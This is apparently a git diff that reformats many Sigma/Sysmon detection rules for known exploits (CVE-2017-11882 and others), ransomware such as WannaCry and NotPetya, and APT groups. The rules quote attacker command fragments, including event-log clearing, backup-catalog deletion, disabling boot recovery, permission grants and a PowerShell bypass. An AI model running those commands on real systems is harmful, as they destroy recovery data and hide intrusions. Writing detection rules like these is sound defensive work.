https://docs.live.net - '@aol.co.uk' condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml b/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml index 623bf087b..bf9635e5d 100644 --- a/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml +++ b/sigma/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2015-1641 id: 7993792c-5ce2-4475-a3db-a3a5539827ef status: stable -description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used - in exploits for CVE-2015-1641 +description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 references: - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 diff --git a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml index bfa93a7ba..b3f6a0bfe 100644 --- a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml +++ b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2017-0261 id: 864403a1-36c9-40a2-a982-4c9a45f7d833 status: test -description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits - for CVE-2017-0261 and CVE-2017-0262 +description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 references: - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html author: Florian Roth (Nextron Systems) @@ -29,7 +28,6 @@ detection: Image|contains: \FLTLDR.exe condition: process_creation and selection falsepositives: - - Several false positives identified, check for suspicious file names or locations - (e.g. Temp folders) + - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) level: medium ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml index 108650792..b9901861d 100644 --- a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml +++ b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml @@ -1,8 +1,7 @@ title: Droppers Exploiting CVE-2017-11882 id: 678eb5f4-8597-4be6-8be7-905e4234b53a status: stable -description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other - sub processes like mshta.exe +description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe references: - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw diff --git a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml index f94f64742..235d6ade7 100644 --- a/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml +++ b/sigma/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2017-8759 id: fdd84c68-a1f6-47c9-9477-920584f94905 status: test -description: Detects Winword starting uncommon sub process csc.exe as used in exploits - for CVE-2017-8759 +description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 references: - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 diff --git a/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml b/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml index 38d7f7c5d..d77f7d10c 100644 --- a/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml +++ b/sigma/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml @@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains|all: - - \AppData\Roaming\Oracle - - \java - - '.exe ' - - CommandLine|contains|all: - - cscript.exe - - Retrive - - '.vbs ' + - CommandLine|contains|all: + - \AppData\Roaming\Oracle + - \java + - '.exe ' + - CommandLine|contains|all: + - cscript.exe + - Retrive + - '.vbs ' condition: process_creation and selection level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml b/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml index 25cf25ac7..e7cae314b 100644 --- a/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml +++ b/sigma/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - InstallArcherSvc condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml b/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml index 7f259b5b8..40e135a1b 100644 --- a/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml +++ b/sigma/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml @@ -1,8 +1,7 @@ title: Malware Shellcode in Verclsid Target Process id: b7967e22-3d7e-409b-9ed5-cdae3f9243a1 status: test -description: Detects a process access to verclsid.exe that injects shellcode from - a Microsoft Office application / VBA macro +description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro references: - https://twitter.com/JohnLaTwC/status/837743453039534080 author: John Lambert (tech), Florian Roth (Nextron Systems) @@ -17,10 +16,7 @@ tags: logsource: category: process_access product: windows - definition: 'Requirements: The following config is required to generate the necessary - Event ID 10 Process Access events: VBE7.DLLUNKNOWN' + definition: 'Requirements: The following config is required to generate the necessary Event ID 10 Process Access events: VBE7.DLLUNKNOWN' detection: process_access: EventID: 10 diff --git a/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml b/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml index 706bd22b2..8e3d1892d 100644 --- a/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml +++ b/sigma/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml @@ -1,9 +1,7 @@ title: NotPetya Ransomware Activity id: 79aeeb41-8156-4fac-a0cd-076495ab82a1 status: test -description: Detects NotPetya ransomware activity in which the extracted passwords - are passed back to the main module via named pipe, the file system journal of - drive C is deleted and Windows eventlogs are cleared using wevtutil +description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil references: - https://securelist.com/schroedingers-petya/78870/ - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 @@ -27,14 +25,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_specific_pattern: - CommandLine|contains: + CommandLine|contains: - 'wevtutil cl Application & fsutil usn deletejournal /D C:' - dllhost.dat %WINDIR%\ransoms selection_rundll32: Image|endswith: \rundll32.exe - CommandLine|endswith: + CommandLine|endswith: - .dat,#1 - - '.dat #1' + - '.dat #1' # Sysmon removes comma - .zip.dll",#1 selection_perfc_keyword: - \perfc.dat diff --git a/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml b/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml index cdff94d9c..e9515aba7 100644 --- a/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml +++ b/sigma/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml @@ -1,8 +1,7 @@ title: Potential PlugX Activity id: aeab5ec5-be14-471a-80e8-e344418305c2 status: test -description: Detects the execution of an executable that is typically used by PlugX - for DLL side loading starting from an uncommon location +description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location references: - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ @@ -93,14 +92,7 @@ detection: - \Windows Kit - \Windows Resource Kit\ - \Microsoft.NET\ - condition: process_creation and (( selection_cammute and not filter_cammute ) - or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu - and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( - selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd - ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng - ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and - not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc - and not filter_rc )) + condition: process_creation and (( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )) fields: - CommandLine - ParentCommandLine diff --git a/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml b/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml index 5f9f74097..b53d08b59 100644 --- a/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml +++ b/sigma/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml @@ -4,8 +4,7 @@ status: test description: Detects WannaCry ransomware activity references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 -author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, - Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/02/03 tags: @@ -28,37 +27,38 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - - Image|endswith: - - \tasksche.exe - - \mssecsvc.exe - - \taskdl.exe - - \taskhsvc.exe - - \taskse.exe - - \111.exe - - \lhdfrgui.exe - - \linuxnew.exe - - \wannacry.exe - - Image|contains: WanaDecryptor + - Image|endswith: + - \tasksche.exe + - \mssecsvc.exe + - \taskdl.exe + - \taskhsvc.exe + - \taskse.exe + - \111.exe + - \lhdfrgui.exe + # - '\diskpart.exe' # cannot be used in a rule of level critical + - \linuxnew.exe + - \wannacry.exe + - Image|contains: WanaDecryptor selection2: - - CommandLine|contains|all: - - icacls - - /grant - - Everyone:F - - /T - - /C - - /Q - - CommandLine|contains|all: - - bcdedit - - /set - - '{default}' - - recoveryenabled - - 'no' - - CommandLine|contains|all: - - wbadmin - - delete - - catalog - - -quiet - - CommandLine|contains: '@Please_Read_Me@.txt' + - CommandLine|contains|all: + - icacls + - /grant + - Everyone:F + - /T + - /C + - /Q + - CommandLine|contains|all: + - bcdedit + - /set + - '{default}' + - recoveryenabled + - no + - CommandLine|contains|all: + - wbadmin + - delete + - catalog + - -quiet + - CommandLine|contains: '@Please_Read_Me@.txt' condition: process_creation and (1 of selection*) fields: - CommandLine diff --git a/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml b/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml index feb4ea82d..6b69846e8 100644 --- a/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml +++ b/sigma/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml @@ -1,8 +1,7 @@ title: Potential APT10 Cloud Hopper Activity id: 966e4016-627f-44f7-8341-f394905c361f status: test -description: Detects potential process and execution activity related to APT10 Cloud - Hopper operation +description: Detects potential process and execution activity related to APT10 Cloud Hopper operation references: - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf author: Florian Roth (Nextron Systems) @@ -23,9 +22,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_cscript: Image|endswith: \cscript.exe - CommandLine|contains: '.vbs /shell ' + CommandLine|contains: '.vbs /shell ' selection_csvde: - CommandLine|contains|all: + CommandLine|contains|all: - csvde -f C:\windows\web\ - .log condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml b/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml index 4a4240d8d..d879f2007 100644 --- a/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml +++ b/sigma/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml @@ -1,8 +1,7 @@ title: Ps.exe Renamed SysInternals Tool id: 18da1007-3f26-470f-875d-f77faf1cab31 status: test -description: Detects renamed SysInternals tool execution with a binary named ps.exe - as used by Dragonfly APT group and documented in TA17-293A report +description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report references: - https://www.us-cert.gov/ncas/alerts/TA17-293A author: Florian Roth (Nextron Systems) @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ps.exe -accepteula - -s cmd /c netstat condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml b/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml index 00b5a210d..f7373e0db 100644 --- a/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml +++ b/sigma/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml @@ -1,8 +1,7 @@ title: Lazarus System Binary Masquerading id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b status: test -description: Detects binaries used by the Lazarus group which use system names but - are executed and launched from non-default location +description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location references: - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) diff --git a/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml b/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml index d39c6d7f7..9fec7cae4 100644 --- a/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml +++ b/sigma/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml @@ -17,12 +17,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -31,11 +26,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: PipeName: - - \atctl - - \comnap - - \iehelper - - \sdlrpc - - \userpipe + - \atctl # https://www.virustotal.com/#/file/a4ddb2664a6c87a1d3c5da5a5a32a5df9a0b0c8f2e951811bd1ec1d44d42ccf1/detection + - \comnap # https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra + - \iehelper # ruag apt case + - \sdlrpc # project cobra https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra + - \userpipe # ruag apt case + # - '\rpc' # may cause too many false positives : http://kb.palisade.com/index.php?pg=kb.page&id=483 condition: pipe_created and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml b/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml index 6804020ac..276b97a0d 100644 --- a/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml +++ b/sigma/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml @@ -26,15 +26,15 @@ detection: selection_other_svchost: Image|endswith: \Microsoft\Network\svchost.exe selection_other_del: - CommandLine|contains|all: + CommandLine|contains|all: - \Windows\Caches\NavShExt.dll - /c del selection_dll_path: - CommandLine|endswith: + CommandLine|endswith: - \AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll - \AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll selection_dll_function: - CommandLine|contains: ',Setting' + CommandLine|contains: ',Setting' condition: process_creation and (1 of selection_other_* or all of selection_dll_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml b/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml index c103a3660..c62608505 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml @@ -1,8 +1,7 @@ title: APT27 - Emissary Panda Activity id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014 status: test -description: Detects the execution of DLL side-loading malware used by threat group - Emissary Panda aka APT27 +description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 references: - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965 - https://twitter.com/cyb3rops/status/1168863899531132929 @@ -29,7 +28,7 @@ detection: selection_svchost: ParentImage|contains: \AppData\Roaming\ Image|endswith: \svchost.exe - CommandLine|contains: -k + CommandLine|contains: -k condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml b/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml index 137b490e3..745cdeaeb 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml @@ -27,17 +27,17 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_path: Image|endswith: \rundll32.exe - CommandLine|contains: + CommandLine|contains: - '%LOCALAPPDATA%' - \AppData\Local\ selection_extensions: - - CommandLine|contains: .dat", - - CommandLine|endswith: - - '.dll #1' - - '.dll" #1' - - .dll",#1 + - CommandLine|contains: .dat", + - CommandLine|endswith: + - '.dll #1' + - '.dll" #1' + - .dll",#1 filter_main_exclude_temp: - CommandLine|contains: \AppData\Local\Temp\ + CommandLine|contains: \AppData\Local\Temp\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml index ad105e312..c681983bc 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml @@ -1,11 +1,10 @@ title: APT29 2018 Phishing Campaign File Indicators id: 3a3f81ca-652c-482b-adeb-b1c804727f74 related: - - id: 7453575c-a747-40b9-839b-125a0aae324b - type: derived + - id: 7453575c-a747-40b9-839b-125a0aae324b # ProcessCreation + type: derived status: stable -description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported - by mandiant +description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant references: - https://twitter.com/DrunkBinary/status/1063075530180886529 - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign diff --git a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml index 918d53e47..ff0e302a2 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml @@ -1,11 +1,10 @@ title: APT29 2018 Phishing Campaign CommandLine Indicators id: 7453575c-a747-40b9-839b-125a0aae324b related: - - id: 033fe7d6-66d1-4240-ac6b-28908009c71f - type: obsoletes + - id: 033fe7d6-66d1-4240-ac6b-28908009c71f + type: obsoletes status: stable -description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported - by mandiant +description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant references: - https://twitter.com/DrunkBinary/status/1063075530180886529 - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ @@ -26,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: -noni -ep bypass $ - - CommandLine|contains|all: - - cyzfc.dat, - - PointFunctionCall + - CommandLine|contains: -noni -ep bypass $ + - CommandLine|contains|all: + - cyzfc.dat, + - PointFunctionCall condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml b/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml index 6ff705624..01dfeefed 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/MuddyWater/proc_creation_win_apt_muddywater_activity.yml @@ -20,19 +20,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_mshta: - CommandLine|contains|all: + CommandLine|contains|all: - vbscript:Close(Execute("CreateObject( - powershell - -w 1 -exec Bypass - \ProgramData\ selection_survey: - CommandLine|contains|all: + CommandLine|contains|all: - Win32_OperatingSystem - Win32_NetworkAdapterConfiguration - root\SecurityCenter2 - '[System.Net.DNS]' selection_pwsh_backdoor: - CommandLine|contains|all: + CommandLine|contains|all: - '[Convert]::ToBase64String' - '[System.Text.Encoding]::UTF8.GetString]' - GetResponse().GetResponseStream() diff --git a/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml b/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml index 63b188a38..2fea8f8f4 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/OilRig/proc_creation_win_apt_oilrig_mar18.yml @@ -1,18 +1,17 @@ title: OilRig APT Activity id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 related: - - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 - type: similar - - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 - type: similar - - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 - type: similar + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System + type: similar + - id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security + type: similar + - id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry + type: similar status: test description: Detects OilRig activity as reported by Nyotron in their March 2018 report references: - https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2023/03/08 tags: @@ -35,7 +34,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_schtasks: - CommandLine|contains|all: + CommandLine|contains|all: - SC Scheduled Scan - \microsoft\Taskbar\autoit3.exe selection_temp: @@ -43,12 +42,12 @@ detection: Image|endswith: .exe selection_service: Image: C:\Windows\system32\Service.exe - CommandLine|contains: + CommandLine|contains: - i - u selection_autoit: ParentImage|endswith: \local\microsoft\Taskbar\autoit3.exe - CommandLine|contains|all: + CommandLine|contains|all: - nslookup.exe - -q=TXT condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml b/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml index 0c7906f64..ffbe14f85 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/Slingshot/proc_creation_win_apt_slingshot.yml @@ -1,8 +1,7 @@ title: Defrag Deactivation id: 958d81aa-8566-4cea-a565-59ccd4df27b0 status: test -description: Detects the deactivation and disabling of the Scheduled defragmentation - task as seen by Slingshot APT group +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group references: - https://securelist.com/apt-slingshot/84312/ author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) @@ -23,10 +22,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains: + CommandLine|contains: - /delete - /change - CommandLine|contains|all: + CommandLine|contains|all: - /TN - \Microsoft\Windows\Defrag\ScheduledDefrag condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml b/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml index f9d3e438c..15a42d7e9 100644 --- a/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml +++ b/sigma/sysmon/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml @@ -1,8 +1,7 @@ title: TropicTrooper Campaign November 2018 id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79 status: stable -description: Detects TropicTrooper activity, an actor who targeted high-profile organizations - in the energy and food and beverage sectors in Asia +description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia references: - 